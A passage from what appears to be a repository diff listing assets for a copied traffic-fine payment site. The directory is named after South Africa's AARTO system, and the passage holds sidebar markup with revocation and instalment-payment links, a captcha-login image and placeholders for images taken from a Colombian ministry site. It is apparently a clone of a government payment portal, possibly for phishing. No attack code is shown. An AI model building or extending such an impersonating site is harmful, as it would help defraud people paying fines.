|
||||
routerlinkactive="isActive" class="sub-menu" href="#/revocation">Revocation</a></li>
|
||||
<li _ngcontent-rqh-c121=""><a _ngcontent-rqh-c121="" routerlink="/instalment"
|
||||
routerlinkactive="isActive" class="sub-menu" href="#/instalment">Instalments
|
||||
Payment</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</div><!---->
|
||||
</app-sidebar>
|
||||
</app-header><!----></app-root>
|
||||
BIN
a8_za_Fine_aarto/public/Static_zy/headerd.jpg
Normal file
|
After Width: | Height: | Size: 16 KiB |
102860
a8_za_Fine_aarto/public/Static_zy/index-yUVF4vys.css
Normal file
|
After Width: | Height: | Size: 3.2 KiB |
BIN
a8_za_Fine_aarto/public/Static_zy/index/captcha-login.jpg
Normal file
|
After Width: | Height: | Size: 3.3 KiB |
|
After Width: | Height: | Size: 27 KiB |
|
After Width: | Height: | Size: 27 KiB |
|
After Width: | Height: | Size: 3.7 KiB |
|
After Width: | Height: | Size: 5.5 KiB |
|
After Width: | Height: | Size: 4.6 KiB |
|
After Width: | Height: | Size: 3.7 KiB |
|
After Width: | Height: | Size: 6.2 KiB |
|
After Width: | Height: | Size: 6.3 KiB |
|
After Width: | Height: | Size: 8.1 KiB |
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20098.webp
|
||||
|
After Width: | Height: | Size: 9.0 KiB |
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20103.webp
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20104.webp
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20105.webp
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20106.webp
|
||||
|
After Width: | Height: | Size: 13 KiB |
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20256.webp
|
||||
|
After Width: | Height: | Size: 11 KiB |
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20270.webp
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20283.webp
|
||||
@@ -0,0 +1 @@
|
||||
No Content: https://mintransporte.gov.co/info/mintransporte/media/galeria/thumbs/thgaleria_400X400_20285.webp
|
||||
|
After Width: | Height: | Size: 2.2 KiB |
|
After Width: | Height: | Size: 2.2 KiB |
|
After Width: | Height: | Size: 1.7 KiB |